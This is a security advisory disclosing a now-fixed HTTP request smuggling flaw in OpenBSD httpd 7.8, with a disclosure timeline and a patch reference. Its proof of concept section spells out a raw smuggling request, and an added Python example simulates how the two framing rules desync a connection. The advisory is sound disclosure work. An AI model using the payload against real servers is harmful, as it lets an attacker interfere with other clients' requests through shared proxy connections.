Advisory ID: SYSS-2026-009
Product: OpenBSD httpd
Manufacturer: OpenBSD
Affected Version(s): 7.8
Tested Version(s): 7.8
Vulnerability Type: CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
Risk Level: High
Solution Status: Fixed
Manufacturer Notification: 2026-02-23
Solution Date: 2026-02-26
Public Disclosure: 2026-04-16
CVE Reference: Not yet assigned
Author of Advisory: Nicola Staller, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The manufacturer describes the product as follows (see [1]):

"The httpd daemon is an HTTP server with FastCGI and TLS support."

Because OpenBSD httpd ignores the Content-Length header of a GET request,
it is vulnerable to HTTP request smuggling.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

OpenBSD httpd ignores the Content-Length header in GET requests. When
httpd is used behind a front end, the unread request body is left on the
connection to the server and poisons it for the next request, which
enables HTTP request smuggling.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Send an HTTP GET request with a Content-Length header and a body such as
the following. Note that line breaks are explicitly shown in the
following request:

GET / HTTP/1.1\r\n
Host: \r\n
Connection: keep-alive\r\n
Content-Length: 28\r\n
\r\n
GET /404 HTTP/1.1\r\n
X-Ignore: 

Issue a second follow-up request in the same TCP connection and observe
that it receives an unexpected 404 response.

Alternatively, configure a reverse proxy in front of OpenBSD httpd. This
more realistic scenario shows that, because the reverse proxy reuses
back-end connections, it is possible to interfere with other clients' TCP
connections as well.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Update to the latest OpenBSD httpd version. For more information, see [4].
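The following added example (not part of the advisory) frames a byte stream modelled on the PoC above in two ways: once honouring Content-Length on every method, as a compliant HTTP/1.1 parser must, and once ignoring it for GET, as the affected httpd did. The smuggled body is constructed here to be exactly 28 bytes so that the follow-up request's request line is absorbed into the dangling X-Ignore header; the helper names are my own.

```python
# Added example: why an ignored Content-Length on GET desynchronises a
# keep-alive connection. Simplified framer: Content-Length only, no
# Transfer-Encoding handling, input assumed to be complete messages.

def frame_requests(stream: bytes, honour_cl_on_get: bool) -> list:
    """Split a raw HTTP/1.1 stream into (method, target, headers, body)."""
    requests, pos = [], 0
    while pos < len(stream):
        end = stream.find(b"\r\n\r\n", pos)
        if end == -1:
            break  # incomplete head; a real server would wait for more data
        lines = stream[pos:end].decode("latin-1").split("\r\n")
        method, target, _version = lines[0].split(" ", 2)
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        body_start = end + 4
        length = int(headers.get("content-length", "0"))
        if method == "GET" and not honour_cl_on_get:
            length = 0  # vulnerable behaviour: the body stays on the wire
        requests.append((method, target, headers,
                         stream[body_start:body_start + length]))
        pos = body_start + length
    return requests

def desync_detected(stream: bytes) -> bool:
    """True when the two framing rules disagree on the request sequence."""
    strict = [(m, t) for m, t, _, _ in frame_requests(stream, True)]
    lenient = [(m, t) for m, t, _, _ in frame_requests(stream, False)]
    return strict != lenient

# Constructed traffic modelled on the advisory's PoC (28-byte body).
SMUGGLED = b"GET /404 HTTP/1.1\r\nX-Ignore:"
POC = (b"GET / HTTP/1.1\r\nHost: \r\nConnection: keep-alive\r\n"
       + b"Content-Length: %d\r\n\r\n" % len(SMUGGLED) + SMUGGLED)
FOLLOW_UP = b"GET / HTTP/1.1\r\nHost: \r\n\r\n"
STREAM = POC + FOLLOW_UP

if __name__ == "__main__":
    for honour in (True, False):
        seq = [(m, t) for m, t, _, _ in frame_requests(STREAM, honour)]
        print("honour CL on GET =", honour, "->", seq)
    print("desync:", desync_detected(STREAM))
```

With the lenient framing the client's follow-up GET / is answered as GET /404, matching the 404 the advisory describes.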
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2026-02-03: Vulnerability discovered
2026-02-23: Vulnerability reported to manufacturer
2026-02-26: Patch released by manufacturer
2026-04-16: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for OpenBSD httpd
    https://man.openbsd.org/httpd.8
[2] SySS Security Advisory SYSS-2026-009
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2026-009.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy
[4] Commit containing the patch
    https://github.com/openbsd/src/commit/9ee2644e0e6156f38dfc289fe17d922ae5497b32

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Nicola Staller of SySS GmbH.

E-Mail: nicola.staller@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Nicola_Staller.asc
Key ID: 0x9DF339F941DD2290
Key Fingerprint: A127 394A F398 B097 2332 637C 9DF3 39F9 41DD 2290

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS
website.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 4.0
URL: https://creativecommons.org/licenses/by/4.0/deed.en